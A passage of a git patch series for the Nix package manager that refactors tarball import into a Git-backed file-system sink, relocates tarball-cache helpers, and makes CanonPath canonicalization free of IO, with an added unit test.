+        for (; prefixLen < names.size() && prefixLen + 1 < pendingDirs.size(); ++prefixLen)
+            if (names[prefixLen] != pendingDirs[prefixLen + 1].name)
+                break;
+
+        // Finish the builders that are not part of the common prefix.
+        for (auto n = pendingDirs.size(); n > prefixLen + 1; --n) {
+            auto [oid, name] = popBuilder();
+            addToTree(name, oid, GIT_FILEMODE_TREE);
+        }
+
+        // Create builders for the new directories.
+        for (auto n = prefixLen; n < names.size(); ++n)
+            pushBuilder(names[n]);
+    };
+
+    bool prepareDirs(const std::vector<std::string> & pathComponents, bool isDir)
+    {
+        std::span<const std::string> pathComponents2{pathComponents};
+
+        if (pathComponents2.size() <= componentsToStrip) return false;
+        pathComponents2 = pathComponents2.subspan(componentsToStrip);
+
+        updateBuilders(
+            isDir
+            ? pathComponents2
+            : pathComponents2.first(pathComponents2.size() - 1));
+
+        return true;
+    }
+
+    void createRegularFile(
+        const Path & path,
+        std::function<void(CreateRegularFileSink &)> func) override
+    {
+        auto pathComponents = tokenizeString<std::vector<std::string>>(path, "/");
+        if (!prepareDirs(pathComponents, false)) return;
+
+        git_writestream * stream = nullptr;
+        if (git_blob_create_from_stream(&stream, *repo, nullptr))
+            throw Error("creating a blob stream object: %s", git_error_last()->message);
+
+        struct CRF : CreateRegularFileSink {
+            const Path & path;
+            GitFileSystemObjectSinkImpl & back;
+            git_writestream * stream;
+            bool executable = false;
+            CRF(const Path & path, GitFileSystemObjectSinkImpl & back, git_writestream * stream)
+                : path(path), back(back), stream(stream)
+            {}
+            void operator () (std::string_view data) override
+            {
+                if (stream->write(stream, data.data(), data.size()))
+                    throw Error("writing a blob for tarball member '%s': %s", path, git_error_last()->message);
+            }
+            void isExecutable() override
+            {
+                executable = true;
+            }
+        } crf { path, *this, stream };
+        func(crf);
+
+        git_oid oid;
+        if (git_blob_create_from_stream_commit(&oid, stream))
+            throw Error("creating a blob object for tarball member '%s': %s", path, git_error_last()->message);
+
+        addToTree(*pathComponents.rbegin(), oid,
+            crf.executable
+            ? GIT_FILEMODE_BLOB_EXECUTABLE
+            : GIT_FILEMODE_BLOB);
+    }
+
+    void createDirectory(const Path & path) override
+    {
+        auto pathComponents = tokenizeString<std::vector<std::string>>(path, "/");
+        (void) prepareDirs(pathComponents, true);
+    }
+
+    void createSymlink(const Path & path, const std::string & target) override
+    {
+        auto pathComponents = tokenizeString<std::vector<std::string>>(path, "/");
+        if (!prepareDirs(pathComponents, false)) return;
+
+        git_oid oid;
+        if (git_blob_create_from_buffer(&oid, *repo, target.c_str(), target.size()))
+            throw Error("creating a blob object for tarball symlink member '%s': %s", path, git_error_last()->message);
+
+        addToTree(*pathComponents.rbegin(), oid, GIT_FILEMODE_LINK);
+    }
+
+    Hash sync() override {
+        updateBuilders({});
+
+        auto [oid, _name] = popBuilder();
+
+        return toHash(oid);
+    }
+};
+
 ref<GitInputAccessor> GitRepoImpl::getRawAccessor(const Hash & rev)
 {
     auto self = ref(shared_from_this());
@@ -918,6 +916,11 @@ ref GitRepoImpl::getAccessor(const WorkdirInfo & wd, bool exportI
     }
 }
 
+ref<GitFileSystemObjectSink> GitRepoImpl::getFileSystemObjectSink()
+{
+    return make_ref<GitFileSystemObjectSinkImpl>(ref<GitRepoImpl>(shared_from_this()));
+}
+
 std::vector<std::tuple<GitRepoImpl::Submodule, Hash>> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore)
 {
     /* Read the .gitmodules files from this revision. */
@@ -951,4 +954,81 @@ ref<GitRepo> getTarballCache()
     return make_ref<GitRepoImpl>(repoDir, true, true);
 }
 
+}
+
+#include "tarfile.hh"
+#include <archive_entry.h>
+
+namespace nix {
+
+GitRepo::TarballInfo GitRepoImpl::importTarball(Source & source)
+{
+    TarArchive archive { source };
+
+    auto parseSink = getFileSystemObjectSink();
+
+    time_t lastModified = 0;
+
+    for (;;) {
+        // FIXME: merge with extract_archive
+        struct archive_entry * entry;
+        int r = archive_read_next_header(archive.archive, &entry);
+        if (r == ARCHIVE_EOF) break;
+        auto path = archive_entry_pathname(entry);
+        if (!path)
+            throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
+        if (r == ARCHIVE_WARN)
+            warn(archive_error_string(archive.archive));
+        else
+            archive.check(r);
+
+        lastModified = std::max(lastModified, archive_entry_mtime(entry));
+
+        switch (archive_entry_filetype(entry)) {
+
+        case AE_IFDIR:
+            parseSink->createDirectory(path);
+            break;
+
+        case AE_IFREG: {
+            parseSink->createRegularFile(path, [&](auto & crf) {
+                if (archive_entry_mode(entry) & S_IXUSR)
+                    crf.isExecutable();
+
+                while (true) {
+                    std::vector<unsigned char> buf(128 * 1024);
+                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
+                    if (n < 0)
+                        throw Error("cannot read file '%s' from tarball", path);
+                    if (n == 0) break;
+                    crf(std::string_view {
+                        (const char *) buf.data(),
+                        (size_t) n,
+                    });
+                }
+            });
+
+            break;
+        }
+
+        case AE_IFLNK: {
+            auto target = archive_entry_symlink(entry);
+
+            parseSink->createSymlink(path, target);
+
+            break;
+        }
+
+        default:
+            throw Error("file '%s' in tarball has unsupported file type", path);
+        }
+    }
+
+    return TarballInfo {
+        .treeHash = parseSink->sync(),
+        .lastModified = lastModified
+    };
+}
+
+
 }
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index b54559def..f82f62fc8 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -2,11 +2,20 @@
 
 #include "filtering-input-accessor.hh"
 #include "input-accessor.hh"
+#include "fs-sink.hh"
 
 namespace nix {
 
 namespace fetchers { struct PublicKey; }
 
+struct GitFileSystemObjectSink : FileSystemObjectSink
+{
+    /**
+     * Flush builder and return a final Git hash.
+     */
+    virtual Hash sync() = 0;
+};
+
 struct GitRepo
 {
     virtual ~GitRepo()
@@ -70,14 +79,14 @@ struct GitRepo
         time_t lastModified;
     };
 
-    virtual TarballInfo importTarball(Source & source) = 0;
-
     virtual bool hasObject(const Hash & oid) = 0;
 
     virtual ref<InputAccessor> getAccessor(const Hash & rev, bool exportIgnore) = 0;
 
     virtual ref<InputAccessor> getAccessor(const WorkdirInfo & wd, bool exportIgnore, MakeNotAllowedError makeNotAllowedError) = 0;
 
+    virtual ref<GitFileSystemObjectSink> getFileSystemObjectSink() = 0;
+
     virtual void fetch(
         const std::string & url,
         const std::string & refspec,
@@ -90,6 +99,8 @@ struct GitRepo
     virtual void verifyCommit(
         const Hash & rev,
         const std::vector<fetchers::PublicKey> & publicKeys) = 0;
+
+    virtual TarballInfo importTarball(Source & source) = 0;
 };
 
 ref<GitRepo> getTarballCache();
diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh
index 4dfb5b329..ae577819a 100644
--- a/src/libutil/fs-sink.hh
+++ b/src/libutil/fs-sink.hh
@@ -26,6 +26,8 @@ struct CreateRegularFileSink : Sink
 
 struct FileSystemObjectSink
 {
+    virtual ~FileSystemObjectSink() = default;
+
     virtual void createDirectory(const Path & path) = 0;
 
     /**

From ed24baaec4f3825ce538d1894ced63bfc82db7c8 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Thu, 21 Dec 2023 04:28:06 -0500
Subject: [PATCH 476/654] Finish separating concerns with tarball cache

There is no longer an `importTarball` method. Instead, there is a
`unpackTarfileToSink` function (back in libutil). The caller can use
this with the `getFileSystemObjectSink` method we added in the last
commit easily enough.

In addition, tarball cache functionality is separated from `git-utils`
and moved into `tarball-cache`. This ensures we are separating mechanism
and policy.
---
 src/libfetchers/git-utils.cc     | 86 --------------------------------
 src/libfetchers/git-utils.hh     | 10 ----
 src/libfetchers/github.cc        | 15 ++++--
 src/libfetchers/tarball-cache.cc | 13 +++++
 src/libfetchers/tarball-cache.hh | 17 +++++++
 src/libutil/tarfile.cc           | 62 +++++++++++++++++++++++
 src/libutil/tarfile.hh           |  3 ++
 7 files changed, 107 insertions(+), 99 deletions(-)
 create mode 100644 src/libfetchers/tarball-cache.cc
 create mode 100644 src/libfetchers/tarball-cache.hh

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 980a5a4d7..42bf42de6 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -315,8 +315,6 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
         return std::nullopt;
     }
 
-    TarballInfo importTarball(Source & source) override;
-
     std::vector> getSubmodules(const Hash & rev, bool exportIgnore) override;
 
     std::string resolveSubmoduleUrl(
@@ -947,88 +945,4 @@ std::vector> GitRepoImpl::getSubmodules
     return result;
 }
 
-ref getTarballCache()
-{
-    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
-
-    return make_ref(repoDir, true, true);
-}
-
-}
-
-#include "tarfile.hh"
-#include 
-
-namespace nix {
-
-GitRepo::TarballInfo GitRepoImpl::importTarball(Source & source)
-{
-    TarArchive archive { source };
-
-    auto parseSink = getFileSystemObjectSink();
-
-    time_t lastModified = 0;
-
-    for (;;) {
-        // FIXME: merge with extract_archive
-        struct archive_entry * entry;
-        int r = archive_read_next_header(archive.archive, &entry);
-        if (r == ARCHIVE_EOF) break;
-        auto path = archive_entry_pathname(entry);
-        if (!path)
-            throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
-        if (r == ARCHIVE_WARN)
-            warn(archive_error_string(archive.archive));
-        else
-            archive.check(r);
-
-        lastModified = std::max(lastModified, archive_entry_mtime(entry));
-
-        switch (archive_entry_filetype(entry)) {
-
-        case AE_IFDIR:
-            parseSink->createDirectory(path);
-            break;
-
-        case AE_IFREG: {
-            parseSink->createRegularFile(path, [&](auto & crf) {
-                if (archive_entry_mode(entry) & S_IXUSR)
-                    crf.isExecutable();
-
-                while (true) {
-                    std::vector buf(128 * 1024);
-                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
-                    if (n < 0)
-                        throw Error("cannot read file '%s' from tarball", path);
-                    if (n == 0) break;
-                    crf(std::string_view {
-                        (const char *) buf.data(),
-                        (size_t) n,
-                    });
-                }
-            });
-
-            break;
-        }
-
-        case AE_IFLNK: {
-            auto target = archive_entry_symlink(entry);
-
-            parseSink->createSymlink(path, target);
-
-            break;
-        }
-
-        default:
-            throw Error("file '%s' in tarball has unsupported file type", path);
-        }
-    }
-
-    return TarballInfo {
-        .treeHash = parseSink->sync(),
-        .lastModified = lastModified
-    };
-}
-
-
 }
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index f82f62fc8..029d39741 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -73,12 +73,6 @@ struct GitRepo
         const std::string & url,
         const std::string & base) = 0;
 
-    struct TarballInfo
-    {
-        Hash treeHash;
-        time_t lastModified;
-    };
-
     virtual bool hasObject(const Hash & oid) = 0;
 
     virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0;
@@ -99,10 +93,6 @@ struct GitRepo
     virtual void verifyCommit(
         const Hash & rev,
         const std::vector & publicKeys) = 0;
-
-    virtual TarballInfo importTarball(Source & source) = 0;
 };
 
-ref getTarballCache();
-
 }
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 1cfc142a5..8b3e6ff20 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -8,7 +8,9 @@
 #include "fetchers.hh"
 #include "fetch-settings.hh"
 #include "tarball.hh"
+#include "tarfile.hh"
 #include "git-utils.hh"
+#include "tarball-cache.hh"
 
 #include 
 #include 
@@ -191,7 +193,7 @@ struct GitArchiveInputScheme : InputScheme
 
     virtual DownloadUrl getDownloadUrl(const Input & input) const = 0;
 
-    std::pair downloadArchive(ref store, Input input) const
+    std::pair downloadArchive(ref store, Input input) const
     {
         if (!maybeGetStrAttr(input.attrs, "ref")) input.attrs.insert_or_assign("ref", "HEAD");
 
@@ -218,7 +220,7 @@ struct GitArchiveInputScheme : InputScheme
                 auto treeHash = getRevAttr(*treeHashAttrs, "treeHash");
                 auto lastModified = getIntAttr(*lastModifiedAttrs, "lastModified");
                 if (getTarballCache()->hasObject(treeHash))
-                    return {std::move(input), GitRepo::TarballInfo { .treeHash = treeHash, .lastModified = (time_t) lastModified }};
+                    return {std::move(input), TarballInfo { .treeHash = treeHash, .lastModified = (time_t) lastModified }};
                 else
                     debug("Git tree with hash '%s' has disappeared from the cache, refetching...", treeHash.gitRev());
             }
@@ -233,7 +235,14 @@ struct GitArchiveInputScheme : InputScheme
             getFileTransfer()->download(std::move(req), sink);
         });
 
-        auto tarballInfo = getTarballCache()->importTarball(*source);
+        TarArchive archive { *source };
+        auto parseSink = getTarballCache()->getFileSystemObjectSink();
+        auto lastModified = unpackTarfileToSink(archive, *parseSink);
+
+        TarballInfo tarballInfo {
+            .treeHash = parseSink->sync(),
+            .lastModified = lastModified
+        };
 
         cache->upsert(treeHashKey, Attrs{{"treeHash", tarballInfo.treeHash.gitRev()}});
         cache->upsert(lastModifiedKey, Attrs{{"lastModified", (uint64_t) tarballInfo.lastModified}});
diff --git a/src/libfetchers/tarball-cache.cc b/src/libfetchers/tarball-cache.cc
new file mode 100644
index 000000000..bb2c51973
--- /dev/null
+++ b/src/libfetchers/tarball-cache.cc
@@ -0,0 +1,13 @@
+#include "tarball-cache.hh"
+#include "users.hh"
+
+namespace nix::fetchers {
+
+ref getTarballCache()
+{
+    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
+
+    return GitRepo::openRepo(repoDir, true, true);
+}
+
+}
diff --git a/src/libfetchers/tarball-cache.hh b/src/libfetchers/tarball-cache.hh
new file mode 100644
index 000000000..e1517038b
--- /dev/null
+++ b/src/libfetchers/tarball-cache.hh
@@ -0,0 +1,17 @@
+#pragma once
+///@file
+
+#include "ref.hh"
+#include "git-utils.hh"
+
+namespace nix::fetchers {
+
+struct TarballInfo
+{
+    Hash treeHash;
+    time_t lastModified;
+};
+
+ref getTarballCache();
+
+}
diff --git a/src/libutil/tarfile.cc b/src/libutil/tarfile.cc
index 187b3e948..3bb6694f8 100644
--- a/src/libutil/tarfile.cc
+++ b/src/libutil/tarfile.cc
@@ -132,4 +132,66 @@ void unpackTarfile(const Path & tarFile, const Path & destDir)
     extract_archive(archive, destDir);
 }
 
+time_t unpackTarfileToSink(TarArchive & archive, FileSystemObjectSink & parseSink)
+{
+    time_t lastModified = 0;
+
+    for (;;) {
+        // FIXME: merge with extract_archive
+        struct archive_entry * entry;
+        int r = archive_read_next_header(archive.archive, &entry);
+        if (r == ARCHIVE_EOF) break;
+        auto path = archive_entry_pathname(entry);
+        if (!path)
+            throw Error("cannot get archive member name: %s", archive_error_string(archive.archive));
+        if (r == ARCHIVE_WARN)
+            warn(archive_error_string(archive.archive));
+        else
+            archive.check(r);
+
+        lastModified = std::max(lastModified, archive_entry_mtime(entry));
+
+        switch (archive_entry_filetype(entry)) {
+
+        case AE_IFDIR:
+            parseSink.createDirectory(path);
+            break;
+
+        case AE_IFREG: {
+            parseSink.createRegularFile(path, [&](auto & crf) {
+                if (archive_entry_mode(entry) & S_IXUSR)
+                    crf.isExecutable();
+
+                while (true) {
+                    std::vector buf(128 * 1024);
+                    auto n = archive_read_data(archive.archive, buf.data(), buf.size());
+                    if (n < 0)
+                        throw Error("cannot read file '%s' from tarball", path);
+                    if (n == 0) break;
+                    crf(std::string_view {
+                        (const char *) buf.data(),
+                        (size_t) n,
+                    });
+                }
+            });
+
+            break;
+        }
+
+        case AE_IFLNK: {
+            auto target = archive_entry_symlink(entry);
+
+            parseSink.createSymlink(path, target);
+
+            break;
+        }
+
+        default:
+            throw Error("file '%s' in tarball has unsupported file type", path);
+        }
+    }
+
+    return lastModified;
+}
+
 }
diff --git a/src/libutil/tarfile.hh b/src/libutil/tarfile.hh
index 237d18c31..6a9c42149 100644
--- a/src/libutil/tarfile.hh
+++ b/src/libutil/tarfile.hh
@@ -2,6 +2,7 @@
 ///@file
 
 #include "serialise.hh"
+#include "fs-sink.hh"
 #include 
 
 namespace nix {
@@ -29,4 +30,6 @@ void unpackTarfile(Source & source, const Path & destDir);
 
 void unpackTarfile(const Path & tarFile, const Path & destDir);
 
+time_t unpackTarfileToSink(TarArchive & archive, FileSystemObjectSink & parseSink);
+
 }

From 78b8db72b53b6657cbdaaac8ad6c0f99fb92ed10 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 15 Feb 2024 21:58:08 +0100
Subject: [PATCH 477/654] Remove tarball-cache.{hh,cc}

TarballInfo is only used in github.cc, and getTarballCache() is a bit
too trivial to have its own file.
---
 src/libfetchers/git-utils.cc     |  7 +++++++
 src/libfetchers/git-utils.hh     |  2 ++
 src/libfetchers/github.cc        |  7 ++++++-
 src/libfetchers/tarball-cache.cc | 13 -------------
 src/libfetchers/tarball-cache.hh | 17 -----------------
 5 files changed, 15 insertions(+), 31 deletions(-)
 delete mode 100644 src/libfetchers/tarball-cache.cc
 delete mode 100644 src/libfetchers/tarball-cache.hh

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 32f665aa0..4f034e9d4 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -986,4 +986,11 @@ std::vector> GitRepoImpl::getSubmodules
     return result;
 }
 
+ref getTarballCache()
+{
+    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
+
+    return GitRepo::openRepo(repoDir, true, true);
+}
+
 }
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index 029d39741..5f68d26a7 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -95,4 +95,6 @@ struct GitRepo
         const std::vector & publicKeys) = 0;
 };
 
+ref getTarballCache();
+
 }
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 8b3e6ff20..e6fbece13 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -10,7 +10,6 @@
 #include "tarball.hh"
 #include "tarfile.hh"
 #include "git-utils.hh"
-#include "tarball-cache.hh"
 
 #include 
 #include 
@@ -193,6 +192,12 @@ struct GitArchiveInputScheme : InputScheme
 
     virtual DownloadUrl getDownloadUrl(const Input & input) const = 0;
 
+    struct TarballInfo
+    {
+        Hash treeHash;
+        time_t lastModified;
+    };
+
     std::pair downloadArchive(ref store, Input input) const
     {
         if (!maybeGetStrAttr(input.attrs, "ref")) input.attrs.insert_or_assign("ref", "HEAD");
diff --git a/src/libfetchers/tarball-cache.cc b/src/libfetchers/tarball-cache.cc
deleted file mode 100644
index bb2c51973..000000000
--- a/src/libfetchers/tarball-cache.cc
+++ /dev/null
@@ -1,13 +0,0 @@
-#include "tarball-cache.hh"
-#include "users.hh"
-
-namespace nix::fetchers {
-
-ref getTarballCache()
-{
-    static auto repoDir = std::filesystem::path(getCacheDir()) / "nix" / "tarball-cache";
-
-    return GitRepo::openRepo(repoDir, true, true);
-}
-
-}
diff --git a/src/libfetchers/tarball-cache.hh b/src/libfetchers/tarball-cache.hh
deleted file mode 100644
index e1517038b..000000000
--- a/src/libfetchers/tarball-cache.hh
+++ /dev/null
@@ -1,17 +0,0 @@
-#pragma once
-///@file
-
-#include "ref.hh"
-#include "git-utils.hh"
-
-namespace nix::fetchers {
-
-struct TarballInfo
-{
-    Hash treeHash;
-    time_t lastModified;
-};
-
-ref getTarballCache();
-
-}

From e27b7e04bf38c1fdf342d6e15b2c003ca9b92cb1 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Fri, 16 Feb 2024 08:45:15 -0500
Subject: [PATCH 478/654] Add note about this being a temp solution

---
 src/libutil/source-path.hh | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh
index b4cfa9ce8..4542a2bac 100644
--- a/src/libutil/source-path.hh
+++ b/src/libutil/source-path.hh
@@ -11,6 +11,10 @@
 
 namespace nix {
 
+/**
+ * Note there is a decent chance this type soon goes away because the problem is solved another way.
+ * See the discussion in https://github.com/NixOS/nix/pull/9985.
+ */
 enum class SymlinkResolution {
     /**
      * Resolve symlinks in the ancestors only.
@@ -121,6 +125,9 @@ struct SourcePath
     /**
      * Resolve any symlinks in this `SourcePath` according to the
      * given resolution mode.
+     *
+     * @param mode might only be a temporary solution for this. 
+     * See the discussion in https://github.com/NixOS/nix/pull/9985.
      */
     SourcePath resolveSymlinks(
         SymlinkResolution mode = SymlinkResolution::Full) const;

From d17e1d9737f68d5f77e9c0f9bfa56da8a4f63816 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sat, 13 Jan 2024 01:11:49 -0500
Subject: [PATCH 479/654] Purify `CanonPath`

The core `CanonPath` constructors were using `absPath`, but `absPath` in
some situations does IO which is not appropriate. It turns out that
these constructors avoided those situations, and thus were pure, but it
was far from obvious this was the case.

To remedy the situation, abstract the core algorithm from `canonPath` to
use separately in `CanonPath` without any IO. Now we know by construction
that those constructors are pure.

That leaves `CanonPath::fromCWD` as the only operation which uses IO /
is impure. Add docs on it, and `CanonPath` as a whole, explaining the
situation.

This is also necessary to support Windows paths on windows without
messing up `CanonPath`. But, I think it is good even without that.

Co-authored-by: Eelco Dolstra 
Co-authored-by: Robert Hensing 
---
 src/libutil/canon-path.cc        | 15 ++++--
 src/libutil/canon-path.hh        | 18 +++++--
 src/libutil/file-path-impl.hh    | 81 ++++++++++++++++++++++++++++++++
 src/libutil/file-system.cc       | 80 ++++++++++++-------------------
 tests/unit/libutil/canon-path.cc | 18 +++++++
 5 files changed, 155 insertions(+), 57 deletions(-)
 create mode 100644 src/libutil/file-path-impl.hh

diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc
index 1223ba33c..fcd53862b 100644
--- a/src/libutil/canon-path.cc
+++ b/src/libutil/canon-path.cc
@@ -1,16 +1,25 @@
 #include "canon-path.hh"
-#include "file-system.hh"
+#include "util.hh"
+#include "file-path-impl.hh"
 
 namespace nix {
 
 CanonPath CanonPath::root = CanonPath("/");
 
+static std::string absPathPure(std::string_view path)
+{
+    return canonPathInner(path, [](auto &, auto &){});
+}
+
 CanonPath::CanonPath(std::string_view raw)
-    : path(absPath(raw, "/"))
+    : path(absPathPure(concatStrings("/", raw)))
 { }
 
 CanonPath::CanonPath(std::string_view raw, const CanonPath & root)
-    : path(absPath(raw, root.abs()))
+    : path(absPathPure(
+        raw.size() > 0 && raw[0] == '/'
+            ? raw
+            : concatStrings(root.abs(), "/", raw)))
 { }
 
 CanonPath::CanonPath(const std::vector & elems)
diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh
index 2f8ff381e..8f5a1c279 100644
--- a/src/libutil/canon-path.hh
+++ b/src/libutil/canon-path.hh
@@ -21,9 +21,21 @@ namespace nix {
  *
  * - There are no components equal to '.' or '..'.
  *
- * Note that the path does not need to correspond to an actually
- * existing path, and there is no guarantee that symlinks are
- * resolved.
+ * `CanonPath` are "virtual" Nix paths for abstract file system objects;
+ * they are always Unix-style paths, regardless of what OS Nix is
+ * running on. The `/` root doesn't denote the ambient host file system
+ * root, but some virtual FS root.
+ *
+ * @note It might be useful to compare `openat(some_fd, "foo/bar")` on
+ * Unix. `"foo/bar"` is a relative path because an absolute path would
+ * "override" the `some_fd` directory file descriptor and escape to the
+ * "system root". Conversely, Nix's abstract file operations *never* escape the
+ * designated virtual file system (i.e. `SourceAccessor` or
+ * `ParseSink`), so `CanonPath` does not need an absolute/relative
+ * distinction.
+ *
+ * @note The path does not need to correspond to an actually existing
+ * path, and the path may or may not have unresolved symlinks.
  */
 class CanonPath
 {
diff --git a/src/libutil/file-path-impl.hh b/src/libutil/file-path-impl.hh
new file mode 100644
index 000000000..39159c7c2
--- /dev/null
+++ b/src/libutil/file-path-impl.hh
@@ -0,0 +1,81 @@
+#pragma once
+/**
+ * @file
+ *
+ * Pure (no IO) infrastructure just for defining other path types;
+ * should not be used directly outside of utilities.
+ */
+#include 
+#include 
+
+namespace nix {
+
+/**
+ * Core pure path canonicalization algorithm.
+ *
+ * @param hookComponent
+ *   A callback which is passed two arguments,
+ *   references to
+ *
+ *   1. the result so far
+ *
+ *   2. the remaining path to resolve
+ *
+ *   This is a chance to modify those two paths in arbitrary way, e.g. if
+ *   "result" points to a symlink.
+ */
+typename std::string canonPathInner(
+    std::string_view remaining,
+    auto && hookComponent)
+{
+    assert(remaining != "");
+
+    std::string result;
+    result.reserve(256);
+
+    while (true) {
+
+        /* Skip slashes. */
+        while (!remaining.empty() && remaining[0] == '/')
+            remaining.remove_prefix(1);
+
+        if (remaining.empty()) break;
+
+        auto nextComp = ({
+            auto nextPathSep = remaining.find('/');
+            nextPathSep == remaining.npos ? remaining : remaining.substr(0, nextPathSep);
+        });
+
+        /* Ignore `.'. */
+        if (nextComp == ".")
+            remaining.remove_prefix(1);
+
+        /* If `..', delete the last component. */
+        else if (nextComp == "..")
+        {
+            if (!result.empty()) result.erase(result.rfind('/'));
+            remaining.remove_prefix(2);
+        }
+
+        /* Normal component; copy it. */
+        else {
+            result += '/';
+            if (const auto slash = remaining.find('/'); slash == result.npos) {
+                result += remaining;
+                remaining = {};
+            } else {
+                result += remaining.substr(0, slash);
+                remaining = remaining.substr(slash);
+            }
+
+            hookComponent(result, remaining);
+        }
+    }
+
+    if (result.empty())
+        result = "/";
+
+    return result;
+}
+
+}
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index 9fa1f62df..3c019a9ed 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -1,5 +1,6 @@
 #include "environment-variables.hh"
 #include "file-system.hh"
+#include "file-path-impl.hh"
 #include "signals.hh"
 #include "finally.hh"
 #include "serialise.hh"
@@ -21,11 +22,18 @@ namespace fs = std::filesystem;
 
 namespace nix {
 
+/** Treat the string as possibly an absolute path, by inspecting the start of it. Return whether it was probably intended to be absolute. */
+static bool isAbsolute(PathView path)
+{
+    return !path.empty() && path[0] == '/';
+}
+
+
 Path absPath(PathView path, std::optional dir, bool resolveSymlinks)
 {
     std::string scratch;
 
-    if (path.empty() || path[0] != '/') {
+    if (!isAbsolute(path)) {
         // In this case we need to call `canonPath` on a newly-created
         // string. We set `scratch` to that string first, and then set
         // `path` to `scratch`. This ensures the newly-created string
@@ -58,69 +66,39 @@ Path canonPath(PathView path, bool resolveSymlinks)
 {
     assert(path != "");
 
-    std::string s;
-    s.reserve(256);
-
-    if (path[0] != '/')
+    if (!isAbsolute(path))
         throw Error("not an absolute path: '%1%'", path);
 
+    /* This just exists because we cannot set the target of `remaining`
+       (the callback parameter) directly to a newly-constructed string,
+       since it is `std::string_view`. */
     std::string temp;
 
     /* Count the number of times we follow a symlink and stop at some
        arbitrary (but high) limit to prevent infinite loops. */
     unsigned int followCount = 0, maxFollow = 1024;
 
-    while (1) {
-
-        /* Skip slashes. */
-        while (!path.empty() && path[0] == '/') path.remove_prefix(1);
-        if (path.empty()) break;
-
-        /* Ignore `.'. */
-        if (path == "." || path.substr(0, 2) == "./")
-            path.remove_prefix(1);
-
-        /* If `..', delete the last component. */
-        else if (path == ".." || path.substr(0, 3) == "../")
-        {
-            if (!s.empty()) s.erase(s.rfind('/'));
-            path.remove_prefix(2);
-        }
-
-        /* Normal component; copy it. */
-        else {
-            s += '/';
-            if (const auto slash = path.find('/'); slash == path.npos) {
-                s += path;
-                path = {};
-            } else {
-                s += path.substr(0, slash);
-                path = path.substr(slash);
-            }
-
-            /* If s points to a symlink, resolve it and continue from there */
-            if (resolveSymlinks && isLink(s)) {
+    return canonPathInner(
+        path,
+        [&followCount, &temp, maxFollow, resolveSymlinks]
+        (std::string & result, std::string_view & remaining) {
+            if (resolveSymlinks && isLink(result)) {
                 if (++followCount >= maxFollow)
-                    throw Error("infinite symlink recursion in path '%1%'", path);
-                temp = concatStrings(readLink(s), path);
-                path = temp;
-                if (!temp.empty() && temp[0] == '/') {
-                    s.clear();  /* restart for symlinks pointing to absolute path */
+                    throw Error("infinite symlink recursion in path '%0%'", remaining);
+                remaining = (temp = concatStrings(readLink(result), remaining));
+                if (isAbsolute(remaining)) {
+                    /* restart for symlinks pointing to absolute path */
+                    result.clear();
                 } else {
-                    s = dirOf(s);
-                    if (s == "/") {  // we don’t want trailing slashes here, which dirOf only produces if s = /
-                        s.clear();
+                    result = dirOf(result);
+                    if (result == "/") {
+                        /* we don’t want trailing slashes here, which `dirOf`
+                           only produces if `result = /` */
+                        result.clear();
                     }
                 }
             }
-        }
-    }
-
-    if (s.empty()) {
-        s = "/";
-    }
-
-    return s;
+        });
 }
 
 
diff --git a/tests/unit/libutil/canon-path.cc b/tests/unit/libutil/canon-path.cc
index bf11abe3e..7f91308af 100644
--- a/tests/unit/libutil/canon-path.cc
+++ b/tests/unit/libutil/canon-path.cc
@@ -41,6 +41,24 @@ namespace nix {
         }
     }
 
+    TEST(CanonPath, from_existing) {
+        CanonPath p0("foo//bar/");
+        {
+            CanonPath p("/baz//quux/", p0);
+            ASSERT_EQ(p.abs(), "/baz/quux");
+            ASSERT_EQ(p.rel(), "baz/quux");
+            ASSERT_EQ(*p.baseName(), "quux");
+            ASSERT_EQ(*p.dirOf(), "/baz");
+        }
+        {
+            CanonPath p("baz//quux/", p0);
+            ASSERT_EQ(p.abs(), "/foo/bar/baz/quux");
+            ASSERT_EQ(p.rel(), "foo/bar/baz/quux");
+            ASSERT_EQ(*p.baseName(), "quux");
+            ASSERT_EQ(*p.dirOf(), "/foo/bar/baz");
+        }
+    }
+
     TEST(CanonPath, pop) {
         CanonPath p("foo/bar/x");
         ASSERT_EQ(p.abs(), "/foo/bar/x");

From 4531585275254f13dae1ff61434e15865a1e796a Mon Sep 17 00:00:00 2001
